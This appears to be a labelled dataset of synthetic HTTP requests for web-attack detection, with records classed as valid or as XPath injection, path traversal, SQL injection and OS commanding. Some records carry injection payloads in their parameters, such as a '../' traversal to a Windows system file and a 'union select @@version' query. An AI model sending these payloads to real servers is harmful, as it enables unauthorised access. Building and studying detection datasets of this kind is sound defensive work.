Upgrade: oeeuii/6.6, inSid6/6.9, srlses/9.9
Warning: 765 www.oiit7.html:14 "goersPi" 
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23789
Start - Id: 49172
class: XPathInjection
GET /nByYaclApKhbnu@Xo/pTAJqY/9tlscctg5o7o7iwssiD/moheat/eM8t/w@-eDCPvs1G4vsqqZ/ekI1.z3GrPSzxO59EySy/pslO-KAI8-FSs/hE/iiarrsenseOay7TC/aj_AOFsIqHQ0_7BF.jpeg?wformiRC@=ephncaxn%27++or++%28i++%3C+++++count%28gt%2Fchild%3A%3Atext%28%29%29+++++and+j+++%3C+++count%28poZhr%2Fchild%3A%3Acomment%28%29%29++++and+k++%3C+count%284zh%2Fchild%3A%3A*%29++++%29++or+%27ieo%27+%3D+%27++++yEawgai%27+++or&aN9SpeDo=hacE08b&nvnoa=2734&xasOtSIrtleryt=74&i5VdO5kaaXdnnt=990842&htaccesTLy3nG6QpqN=he+fonevale HTTP/1.1
Host: 110.238.182.230
Connection: keep-alive
Accept: application/rtf, audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=712
Client-ip: 38.175.250.11
Cookie: mfihztew9l0seIj=9
Cookie2: $Version="7"
Date: Wed, 02 Feb 05 16:51:01 CET
ETag: "mOIFkg9nVCC_XPd"
Expect: 100-continue
From: sbgdd@uletat2q.net
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Sun, 16 Nov 08 08:04:31 GMT
If-Match: "QS05bL4X-IDJEd53vO0-"
If-None-Match: "st4x0Mea.kYgi2.46"
If-Range: *
Max-Forwards: 4377
MIME-Version: 2.4
Pragma: Eec='Lhos'
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Basic NGk2ZWVsOnJhcm1sSGM=
Range: 96-,87333-9
Referer: http://wdnc8.it/sn1eiW.htm
TE: gzip;q=0.4,trailers,trailers
Trailer: TE
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 5.6; aF-Dx; rv:6.3.1) Gecko/42268262
UA-CPU: x86
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 290x3654
Via: HTTP/4.0 www.ntai7ec.js, 9.8 www.hiaeS.shtml
Transfer-Encoding: gzip
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 6850092
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49172
Start - Id: 11280
class: Valid
GET /oUsMWn/8TvNHiCInNDsK3KOujj/rUMX97nVMnrB/hO@X1oCUMyUME9hzP/oWqlXpy1/t-i9CU1T6BB30F.jpg?opDlaoleytint=is&cbnx=wsrtmi&nqnz=7lo3aas&mochaTZQoologzO=11 HTTP/1.0
Host: www.ioeeec.cz
Connection: 8Eag4h
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.8, identity, identity;q=0.1, deflate
Accept-Language: ffspi-1fesixb, j-f3x;q=0.4, es5d-rtuaeI, h7eees8e-zec
Cache-Control: only-if-cached
Client-ip: 43.28.8.140
Cookie: 8tselectMwB=samrt;snusx9oauaune=:ntceform<3e def;ieaob=1w1~v4d;oi5S7tof6yS8TA=lK762pDnF3T
Cookie2: $Version="68"
Date: Sat, 15 Jul 06 15:42:13 GMT
ETag: W/"i3D@tv.QMOZhRlbwwT"
Expect: 100-continue
From: 7urSh@tin1aU.biz
If-Modified-Since: Mon, 10 Nov 08 18:24:47 CET
If-Unmodified-Since: Sun, 25 Jan 04 08:40:43 CET
If-Match: *
If-None-Match: *
If-Range: "ACjazMr56rQdmQ7N0"
Max-Forwards: 5357
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: tereez ersesE9=gFyrh
Authorization: Digest realm
Range: 7836-892
Referer: http://www.pamc3v.it/ilDdnw/lbhr6n0y/iu9nrls.bin
TE: deflate,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/3.8 (X11; U; Unix 5.6; vn-ec; rv:4.6.2) Gecko/72142544
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4159x0330
Via: 5.7 www.8ltl.gif, 7.4 142.153.242.224
Transfer-Encoding: CctI; 19wi=rao6aega
Upgrade: Iinf/7.1, oavrcs/0.2, aMti/2.8, uud/0.6, sprmls/3.8
Warning: 337 216.50.53.199 "osavyeiduatyteha" "Tue, 27 Apr 04 05:08:34 GMT"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 7492268797432274
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11280
Start - Id: 29735
class: Valid
GET /ixF11/pvea1ereihnGm4rhq/loeotAeydioeiiz/shyt6rpJTr/rnnVdZA4KZp9/HY.lsautoexecnullLbformN/aT6z_vu/wotynmeeMahcfdnte/hstpsy0a/LXEv0t8C5QF1aO.asmx?eeLuIunW=ntsanfo%5D HTTP/1.0
Host: 151.38.181.138
Connection: close
Accept: text/*, application/*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: t-rI;q=0.2, natde-hatuqah, 1uaeT-el5tuO8;q=0.1, Deo-e7IgsGsE
Cache-Control: max-age=62
Client-ip: 58.183.91.158
Cookie: ee7ojaeom0e=02areeieknl;uOnisrtdsuti=>nntemgOsopeyc
Cookie2: $Version="2"
Date: Sun, 22 Jan 06 01:42:32 GMT
ETag: "XL@wdCoPY8-Rem3gz"
Expect: chxFad
From: nrmoch5@tnieiSbE.com
If-Modified-Since: Sun, 20 Aug 06 01:43:42 UTC
If-Unmodified-Since: Wed, 22 Jul 09 23:38:55 GMT
If-Match: "qxGUmTULMJm-RPwZDn"
If-None-Match: "QTBhlahbx17r_0y6"
If-Range: Tue, 22 Nov 05 20:21:51 CET
Max-Forwards: 8
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: ronlIe iihoIE=hrOros
Range: -6
Referer: http://htGm4EdE.cz/ossycs/zwhnojEs/y0eauzdn/5vEwsvoc/whoEan.mpg
TE: gzip
Trailer: Accept-Encoding
User-Agent: a0wg/2.9
UA-CPU: MIPS
UA-Disp: 9135,374,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1488x053
Via: HTTP/0.4 2.164.37.243
Transfer-Encoding: compress
Upgrade: etort/8.1, nec/0.0, otezh/8.2, etwlre/8.4
Warning: 115 www.s3ub.html "rhndhdihiimuIsehs" 
X-Forwarded-For: 234.217.103.7
X-Serial-Number: 23055692041391368156
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29735
Start - Id: 45439
class: PathTransversal
POST /tKYRFy8IoDV/ejVr1Rh@WD1Q/dnynn3eGdtl6lexshff/iwDBDCPyN26uS3D_.js? HTTP/1.1
Content-Length: 241
Content-Language: 9tafhncf,ienn,iteDa
Content-Encoding: deflate
Content-Location: /3RgtiTrr/tpslda/ertienan.sh
Content-MD5: UXZzb0t1cmljemVhbnJuZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Aug 06 22:39:23 UTC
Host: 251.112.1.207:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: yiTrdi6-d;q=0.6, gcihtw-athenei;q=0.4
Cache-Control: max-age=60
Client-ip: 112.92.61.252
Cookie: jdkeIyEtSislcS=t8|;ds=hoxhonullt nupdatehttpe10gar ;hAxqeh9en=9k-psev+ t;JzgKdVdbC=zh_C22W3-I.0;miehlubhaeE=04;HwPNoe=52
Cookie2: $Version="71"
Date: Sun, 29 Apr 07 04:52:58 UTC
ETag: "cWVaQKspJRouILSecHXU"
Expect: 100-continue
From: ocohvdu@SeeNcoarh7.cz
If-Modified-Since: Wed, 12 Jan 05 19:22:27 CET
If-Unmodified-Since: Sat, 04 Apr 09 19:38:07 CET
If-None-Match: *
If-Range: *
Max-Forwards: 600
Referer: http://www.oowde.net/nicsaePt/qdCrbna.bin
TE: trailers,chunked;q=0.4,chunked
Trailer: TE
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 6.8; tt-ub; rv:0.5.4) Gecko/00762240
UA-Disp: 6378,1062,32
Via: 6.2 www.ceool.css, 3.8 51.165.173.215
Transfer-Encoding: deflate
X-Forwarded-For: 173.42.173.213
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tucolyjgec1t=wvu&Oncumega16af6Da=0&kcvgns0nus=aoahcaFDtitjr&w7fscisterb=owwetykaT5s&tpapto87pm1my=60604129&hetnsor8crw=../../../../../../WINNT/autoexec.bat&s1ees7b=crsOgwd3osooyewfp&dogyrt=0020&je=7&t6eP=521304&TU@TnetcatFqZ=ht

End - Id: 45439
Start - Id: 17173
class: Valid
GET /eablmhtmtEt/sd/eRhaemit4ttascest/bjESS/xwslrahlaeor/eeid/kkOi8aL/1qVeL4On.v4replace0/onrutueAcnmlt4/tZqqdOP/bk.mdb?biczt=4&onira260wg=mt3openeo%3Bhe9%25a2fom&3jt5=cjida7ceThtiet0svh&rhdyexa9scg=811631&ovO0s=8022&fcTgntn4bacet=9897&7xBlLagaye=3403435&S6fa=ne&cE8ajtdS=d3Z&ntu=930&aT51Ei=7snegourmmR HTTP/1.1
Host: www.oioriuod8.biz:2
Connection: nst2eg
Accept: text/*;q=0.4, application/*
Accept-Charset: iso-8859-8, iso-10646-ucs-2, x-mac-chinesesimp;q=0.2, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 199.180.99.118
Cookie: snmleztzaennegi=%gn%;ltsYeP=055824
Cookie2: $Version="31"
Date: Mon, 28 Aug 06 20:52:40 CET
ETag: "zhQch-fDvy2Xl-ugZ1"
Expect: 100-continue
From: nrne6nts@ueh4ulucb.st
If-Modified-Since: Sun, 01 Jul 07 18:25:12 UTC
If-Unmodified-Since: Fri, 16 Apr 04 05:07:43 GMT
If-Match: "gtg0ryW99xejmmBqK"
If-None-Match: *
If-Range: *
Max-Forwards: 857
MIME-Version: 3.2
Pragma: evJceoa=n
Proxy-Authorization: Basic RW9keVA6c29waXNoZWI=
Authorization: Digest algorithm=tuoqNg
Range: -785968,-02
Referer: http://www.nzaeHo.uk/twbntx2.swf
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.9 (Windows; U; WinNT 7.0; am-eo; rv:4.0.8) Gecko/90490851
UA-CPU: StrongARM
UA-Disp: 150,488,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 674x357
Via: 8eteir/8.9 234.190.186.64:92, HTTP/5.7 80.201.249.219
Transfer-Encoding: ylme; aabnifo=ek8dpi
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 805 www.tiToe.js:8 "nemt6tdhmtanm" "Sun, 01 Feb 04 01:16:58 CET"
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 80895113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17173
Start - Id: 17492
class: Valid
GET /vO7gVkUH8/CJL/mER5d3oXGU4I3Y/stIkxswvbrr1/eGno/80e/tviorwOcemdtssv4e/4F8KnMR.htm?srrcwf8ielbtep=afRYZiK&lUhoa1jer=669318&ihrt=43&huenlnlltiwhe=8&r7onlt=hh%3Ant%3BzR&mEhh=322088841&riiiI=316438&ZQ7PvDZ=a3null%26eh+quamtphpl%3E&Seedtpseo2ah=rb&system4PFlKVC2phpft=rI9IKii5HlPy&Zn=nswbsl&td=2 HTTP/1.0
Host: www.sggdoQa7.net
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.8, iso-8859-8-i
Accept-Encoding: 
Accept-Language: atdSmJo-nttSaa, hquep-ocmr;q=0.6, h-32tf, zliap-anorEet
Cache-Control: no-store
Client-ip: 78.87.38.252
Cookie: oieiyqon=52878;shifossb1rmare=ooftpy;bovesas=76Wiv;7netcatD3j=1580;nqdimSgs=;]
Cookie2: $Version="264"
Date: Thu, 02 Apr 09 23:11:16 CET
ETag: "VfDQeglA-OWCeNU4sa"
Expect: Entgamhr
From: aqaarte@masstqj.net
If-Modified-Since: Sun, 26 Jun 05 04:48:08 CET
If-Unmodified-Since: Wed, 11 Oct 06 05:37:10 GMT
If-Match: "hn7mNEyqBLH3EEkD-3"
If-None-Match: *
If-Range: *
Max-Forwards: 26
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM dzJyVWk2bzB0M1JFZHRFOXR3c3J2c3Jkbmlkc2hvb25lbXRsTWQ4bQ==
Authorization: NTLM ZHBoeXB1cnI3czBvbnJmaW95dGFlZHRpaWE3aWNybGFFaA==
Range: 6-05,-0890
Referer: http://xite.fr/xwabzo.bin
TE: trailers
Trailer: Range
User-Agent: gnos/3.2.4
UA-CPU: StrongARM
UA-Disp: 5103,184,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 682x5954
Via: 7.7 43.124.103.169:61832
Transfer-Encoding: deflate
Upgrade: mS8/8.1, rssen/7.0, 8Wjew/3.0, tFw4yq/8.9, kkBk/0.0
Warning: 215 www.knhetdi.shtml "netciN" 
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17492
Start - Id: 20801
class: Valid
GET /iaUaXV83HYZCqM4SAe/AgGsSaccept.X/hrn0rhaPsenmuazin/DrA5N7likecCmfrom.php4? HTTP/1.0
Host: 227.118.243.178
Connection: rkeh
Accept: text/plain;q=0.9
Accept-Charset: x-mac-chinesesimp, iso-8859-9
Accept-Encoding: 
Accept-Language: w-h, aisdoJs-fd
Cache-Control: min-fresh=8036
Client-ip: 207.0.235.72
Cookie: sis=fae:tt)Wcio;dh=132;Reis=7;ix2ror3=hr4atEcRr<d\so
Cookie2: $Version="38"
Date: Thu, 07 Apr 05 15:11:54 GMT
ETag: "ND2cOGQTQdsvCqhdp9q"
Expect: 100-continue
From: txeT@aevntoegn.com
If-Modified-Since: Thu, 04 Jan 07 17:34:16 UTC
If-Unmodified-Since: Mon, 15 May 06 20:13:07 CET
If-Match: "5-Z9fx5yCZNi0y3DMCQ"
If-None-Match: *
If-Range: "0fMor@H5lJecmmjz94w"
Max-Forwards: 7899
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic dGh0Zmw6YWJhYWY=
Authorization: NTLM ZXRpMHJlVGk2aGVlUmc4aGRkY2R1dHV0Z0lJaWFtZXdycnBz
Range: 468072-,7838-92,92-4796
Referer: /gueonh/snwa/trdQi2/gili.mdb
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: rvC0A-oU http://www.RKNBttat.org
UA-CPU: x86
UA-Disp: 404,2413,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7338x309
Via: HTTP/4.4 www.hcro.shtml:616
Transfer-Encoding: gzip
Upgrade: nm2Tie/2.4, a4heer/9.4, scnsH/7.8, kDsMm/2.1
Warning: 034 102.172.89.25 "Utind" "Fri, 20 Jul 07 06:53:57 CET"
X-Forwarded-For: 204.193.168.184
X-Serial-Number: 39917227024822129
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20801
Start - Id: 26694
class: Valid
GET /msngs69iselTohka/keOwindow.openvk_ODqpassthrueeTJ/enAzU@IWPLIcE882Y/de3ieuiutsanne7nqyni/stgssuehdst/r77@K1hWmFx/iFDEU5-PsgjuOjotqPZ/lhecmtrkiannw1al/GlfcpTl4kXIdL_P/nlorw15chtso2mg/ZQxshutdown.php3?Ox5iiaiOfln=75&tx=6906250&hL6or=nGT&u3be3NoeehsfJqi=0%5D8&er4nai=4&peahBinj=o9m&DW6IDnzUndR=ai%5Dyivuu&e2uTft1noyo=6747474450&nitsn0s=%5Byr&psicsunnxi=aSiA5gA1Bp&ejs=8148&ys1x=ieertss6cdEiBm&lyWlsns=nm&forstd3Ecxiol=nMwdte%28p%3Fdowyndanl%27&r8Q@d=a05 HTTP/1.0
Host: 56.20.23.248:3
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1250, windows-1251, windows-1255, windows-1258, windows-1258;q=0.1
Accept-Encoding: compress, deflate;q=0.7, identity;q=0.6, identity;q=0.7
Accept-Language: iso-mssest;q=0.3, 7-uffm;q=0.5
Cache-Control: no-cache
Client-ip: 33.79.213.34
Cookie: crg6S_libFtHl=v9txtermhome tusdrradrop+ dstO;iaysN=il50h_fa-0
Cookie2: $Version="85"
Date: Fri, 16 Jul 04 09:39:22 UTC
ETag: "ozyrtrwA_AnPCK6mOBnZ"
Expect: 100-continue
From: aenrotes@hoereselr.be
If-Modified-Since: Sun, 18 Sep 05 18:01:33 GMT
If-Unmodified-Since: Thu, 23 Apr 09 14:01:41 UTC
If-Match: "4WjfymtdwB46xxH9x"
If-None-Match: *
If-Range: Mon, 02 Jul 07 20:39:09 GMT
Max-Forwards: 7970
MIME-Version: 5.9
Pragma: tn='nlgft3v1'
Proxy-Authorization: WwHe eFalu=21hO7e
Authorization: Basic dFNyY2FlOmZuckF0dzY=
Range: 25-
Referer: http://www.soryhd.uk/lid99uia/oaht3/setobyc/fAptea.php4
TE: trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: igrufns (l8u3gn9OW; aUp.k1zii)
UA-CPU: PowerPC
UA-Disp: 221,658,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 190x433
Via: 5.9 132.56.90.53:2, HTTP/4.5 42.234.99.141:1
Transfer-Encoding: identity
Upgrade: lWRqc/4.7, oaNoeA/8.1, SytTu/2.1, oaahe/2.1
Warning: 574 42.50.42.84 "esbdOnaSdh" 
X-Forwarded-For: 168.224.202.103
X-Serial-Number: 55910
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26694
Start - Id: 27865
class: Valid
GET /efaomnerro.mdb?trArxusfseite=c+3Eoi&galeeiansm=ii&bf70eeejeeac=55&mibc5fdnIsg0i=soeEsn0zpe&cmeWusg2ppouebt=hheto1i&KvSCzx@uxA%u=f4&98a=7991&dnnhhNerb0oi8=rCIU&gdtSr9enr=1e HTTP/1.0
Host: www.rapVnie.fr:02
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-15, euc-cn, x-mac-roman, hz-gb-2312;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 202.94.102.161
Cookie: scOnleynty3=hiaRgsulogincludenetcate&drlsreplace;7lhBn=pae7xs87rsncssDet
Cookie2: $Version="757"
Date: Fri, 01 Jul 05 06:24:42 UTC
ETag: W/"Y2kvxfyQGID0o@vp"
Expect: 100-continue
From: iIjd@CLYb5so1.org
If-Modified-Since: Tue, 07 Aug 07 09:55:01 CET
If-Unmodified-Since: Mon, 29 Mar 10 24:58:12 UTC
If-Match: "BQ-VXhQY8EqP63M5lYPN"
If-None-Match: *
If-Range: Wed, 18 Jun 08 16:32:34 UTC
Max-Forwards: 84
MIME-Version: 3.3
Pragma: am0ad='tbyk'
Proxy-Authorization: Itthu rqthihh=meeo
Authorization: NTLM dzNxUjgybmNoZnBjU2FsbmVhZHZuMWVuNmFkZVNpc2h3YmU=
Range: -2,17-1694,303-9
Referer: http://www.Dht6.gov/wpUg/wzLde/eeycbr.jpg
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 9.9; fu-at; rv:0.3.5) Gecko/34634209
UA-CPU: MIPS
UA-Disp: 0211,623,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0689x744
Via: 6.3 224.57.18.154, FTP/7.3 235.118.12.16, 8.4 www.tpte.jpg:34379
Transfer-Encoding: compress
Upgrade: niltie/3.1
Warning: 889 193.102.56.100 "uk4rhehi9Tu" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 92325368257
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27865
Start - Id: 9762
class: Valid
GET /Eoztstneeig8b7f/rasaLelrRNXh0/CgrenicEkagy.asmx?teCcocE=o9pvt&kRtCFG=i38h&n3eidtgresdbIe=0dam&Sala=gere0&LacraMowhIrjoa=srHr&ey=liTACeyMmt1s&tztnqj=sweoi&b_gJtelnetq=Hh%25+&estg0ri=149619&vewetefed=sb4He9totaReatm&eAexma1haedin5t=ae6 HTTP/1.0
Host: 84.63.79.140:4
Connection: close
Accept: */*;q=0.7
Accept-Charset: cp-950, iso-8859-15;q=0.7, shift_jis, euc-cn;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: tnihvibf='i'
Client-ip: 253.90.150.161
Cookie: tauE7rtm=ont   ihinsertoG>ea7&legi;52v0a0Y9pscript= el6:7=
Cookie2: $Version="750"
Date: Tue, 13 Jan 09 18:41:30 UTC
ETag: "4fivot.J_rjq4aU"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Fri, 24 Jul 09 02:19:38 UTC
If-Unmodified-Since: Sun, 24 Sep 06 09:58:21 UTC
If-Match: "EnPGKJySfcKp584_h"
If-None-Match: *
If-Range: Tue, 27 May 08 12:40:44 GMT
Max-Forwards: 6
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: tonFs fnhRm=aeofnoj
Authorization: yoart rhadah=tohsNyaf
Range: -585780,60750-302396,970996-
Referer: /epryi/atneasi/n769/ihan/swsk.pdf
TE: trailers,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/9.1 (X11; U; Solaris 6.0; eo-cl; rv:3.9.6) Gecko/12341186
UA-CPU: 68000
UA-Disp: 5705,3975,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 493x9189
Via: sLmbto/2.0 236.228.146.208
Transfer-Encoding: deflate
Upgrade: ac6/4.7
Warning: 953 180.113.100.133 "os75rearnh" "Sun, 27 Apr 08 19:25:31 CET"
X-Forwarded-For: 199.75.6.60
X-Serial-Number: 45559404209574
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9762
Start - Id: 16058
class: Valid
GET /deYemta27z.htm?Terdisenenl=wJUD&irssin=rPEI&utavcEriaepn3os=girnwSHsabil4rag&stLee=fnodeletes+&gAdtehsagtov=te%24t5ae%3Bysx HTTP/1.0
Host: 33.154.222.132
Connection: hrngai
Accept: audio/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wtcimji-oh, seat-iD;q=0.3, r2w-nolroRet, 9pedaaDE-p;q=0.0
Cache-Control: no-store
Client-ip: 14.13.65.156
Cookie: 3ee7atcu=n;Jn420aO2c5EE=totmo@Fi;DKE3=5278
Cookie2: $Version="976"
Date: Mon, 11 Sep 06 02:14:07 CET
ETag: "TAeqn8RuxKncBO-M7gv"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Sun, 23 Oct 05 15:23:42 UTC
If-Unmodified-Since: Mon, 18 Jun 07 23:33:38 UTC
If-Match: *
If-None-Match: "bj9AHG6gYP3Whdu42PKi"
If-Range: Wed, 21 Sep 05 11:23:53 CET
Max-Forwards: 90
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="neh7g"
Authorization: Basic Y3c3b213OTpPbkd3ZWlhbg==
Range: 027-,-7
Referer: http://www.aorSht.st/aosoj/rN3nge3t.exe
TE: trailers,deflate;q=0.0,trailers
Trailer: Via
User-Agent: Mozilla/4.7 (compatible; MSIE 0.3; Open BSD i386; pwgenIESa; gc9lAu; lAoCst)
UA-CPU: MIPS
UA-Disp: 738,0570,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 973x791
Via: FTP/7.4 www.9Ryoihe.jpg, niomYm/8.7 www.rtc7o.jpg
Transfer-Encoding: gzip
Upgrade: erd2c/3.3, ohn/2.9
Warning: 434 21.156.106.72 "eo6ow" "Fri, 28 Oct 05 11:38:33 CET"
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 02506
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16058
Start - Id: 42633
class: SqlInjection
GET /tLDlRF-f@/vtmp966yFeUkUz60-/aN_bDzYyZNi/a4dU9ECLNjcJG/0Z/smtsSsogtpug/hNIA/4kn/hwE7Rnwye/hw1by@W6AEIyBY7@nM@D.php4?azMegie=e%3Aro%29&rr=0053077&bh=831568&oiwooru=rm9sdha5t&onais=4u&snH=Nihucsgsiaw&Gy_0PCgroup byBb=%27+union+select+++++%40%40version%2C1%2C1%2C1--&alo0etayuechaTq=hn%2Fii&jcb=t1%3C%5Cw%5Df5fsnA%5Dez&Drgerytil=88270882 HTTP/1.1
Host: 70.34.6.133
Connection: close
Accept: */*
Accept-Charset: windows-1258;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: min-fresh=17675
Client-ip: 107.228.29.96
Cookie: r02s=tDb@;ib5sdms8srser=linDuy ntaccept ;JBIy=nae;dm6=1
Cookie2: $Version="596"
Date: Sun, 17 Jan 10 09:08:34 GMT
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: gotca@lpobi9rhDa.org
If-Modified-Since: Sun, 26 Oct 08 07:47:23 GMT
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "zp4dB826AD8r00J"
If-None-Match: *
If-Range: Sat, 19 Nov 05 17:56:43 CET
Max-Forwards: 1
MIME-Version: 3.2
Pragma: o='pgm'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM OTFveGhqbGFlMHRvb2FkaXJPY3NxOG1zdGFmM3Rzam5SdmU=
Range: 72326-9838
Referer: /toft/teAlxyru/gTe2ll/sPehd.png
TE: chunked;q=0.3,trailers,trailers
Trailer: Accept-Charset
User-Agent: h3KSAjOP http://www.esaref.be
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4720x346
Via: 6.1 243.57.154.98
Transfer-Encoding: identity
Upgrade: xpnlin/0.7, nrmbin/0.8, 1tn7c/8.2, 0Hj/3.5, v2sh/4.3
Warning: 162 www.tgbma.css:1 "eWemetp9erNow3n" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42633
Start - Id: 8388
class: Valid
GET /ojKrbFpaloM0Z/aN2CpLL1k3ZZ-A0E0iM_/gIqHb0R53wgetprocessing-instructionQz8/5IN2/tihaxTatceci5lpreens/edoto0fnee/ogLsx/0GZFoyEyTqZzlO1Hpl2/hyQ9siM9q9ub/g8yjhhaetewgxac/9XNi76idFtLU8K508n.aspx?GB0uZ5=g&oiq2hNiDr=oTZopIBI1Y&tLqgZo5a=tCf4KHo&ddehinrc=rg9PaWohv&7aort0mle=71169020&cZhSheterityow=eenv&nsugcribhSndb=e3ri8alidaYe HTTP/1.0
Host: 174.44.164.188:10
Connection: Iduaen
Accept: audio/*, text/xml;q=0.7, image/*;q=0.2
Accept-Charset: x-mac-chinesesimp;q=0.7, cp-950
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 55.14.13.126
Cookie: 2ed9inerriT=olocationsig$https
Cookie2: $Version="05"
Date: Thu, 12 Jul 07 18:24:24 GMT
ETag: "3jaqTACFujJ6duM"
Expect: untOhhii=htmg
From: eeqsa@nsrtpHttai.com
If-Modified-Since: Tue, 27 Nov 07 23:50:47 CET
If-Unmodified-Since: Tue, 27 Nov 07 17:14:14 CET
If-Match: "FjQ246waaloqP.heIAs"
If-None-Match: "CYMVf405fU3PDIfl"
If-Range: Sat, 24 Sep 05 13:00:25 CET
Max-Forwards: 9
MIME-Version: 9.5
Pragma: LvoYhn=R
Proxy-Authorization: Basic ZGtjczplWWNuZHRmRA==
Authorization: a1tff cno1lhs=lieHhEc
Range: 994131-66069
Referer: /nah3tGia/dwvasen/oomam8n/issi2Bp/m2zaaete.asmx
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: mIiM6Ypn@ http://www.4ereR6lt.com
UA-CPU: MIPS
UA-Disp: 283,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4723x390
Via: 0.0 243.162.56.96
Transfer-Encoding: gzip
Upgrade: o1iL/4.6
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 4380608
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8388
Start - Id: 42799
class: OsCommanding
GET /eBQjPwj20io/soDrdamwX/oFW7YdX5GiPThHpAwx/hq/6V9CzzryI/hbCci2ftbnaif6uwfrqe.cfm?sfanixmtee=nafN&cARihsdbeo9ie=24882 HTTP/1.0
Host: 129.106.101.38:80
Connection: ttihtl
Accept: text/xml, image/*, audio/x-wav
Accept-Charset: windows-1255;q=0.0, x-mac-icelandic, iso-10646-ucs-2;q=0.9, cp-932
